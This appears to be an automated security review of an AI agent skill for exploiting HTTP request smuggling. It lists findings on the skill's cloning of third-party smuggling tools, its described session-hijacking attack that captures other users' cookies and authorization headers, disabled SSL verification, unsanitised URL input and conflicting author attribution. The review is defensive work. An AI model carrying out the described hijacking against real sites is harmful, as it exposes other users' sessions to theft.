The Agent Skills Directory

[EXTERNAL_DOWNLOADS]: The skill instructs the agent to clone external code repositories from third-party sources, specifically github.com/defparam/smuggler.git and github.com/BishopFox/h2cSmuggler.git. These sources are not included in the verified trusted organizations list.
[DATA_EXFILTRATION]: The documentation in SKILL.md provides explicit instructions for performing session hijacking. 'Attack 2' describes a method to capture other users' requests, including sensitive session cookies and authorization headers, by smuggling a partial request that causes the target application to append the next user's data into a public-facing field like a comment body.
[COMMAND_EXECUTION]: The provided scripts/agent.py performs low-level network operations using raw sockets to bypass standard HTTP parsing. Additionally, the script explicitly disables SSL certificate verification (ssl.CERT_NONE), which is a security best-practice violation that could expose the connection to man-in-the-middle attacks.
[INDIRECT_PROMPT_INJECTION]: The skill features a data ingestion point where user-supplied URLs are processed by the agent.py script. These inputs are used directly in network operations (raw socket writes and HTTP requests) across the identify_architecture and run_assessment functions. The absence of strict input sanitization on the URL beyond basic parsing creates a surface for potential exploitation if the agent is directed toward malicious or internal targets.
[METADATA_POISONING]: There is a discrepancy in the skill's attribution, as the YAML frontmatter identifies the author as 'mahipal' while the LICENSE file attributes the work to 'mukul975'.

exploiting-http-request-smuggling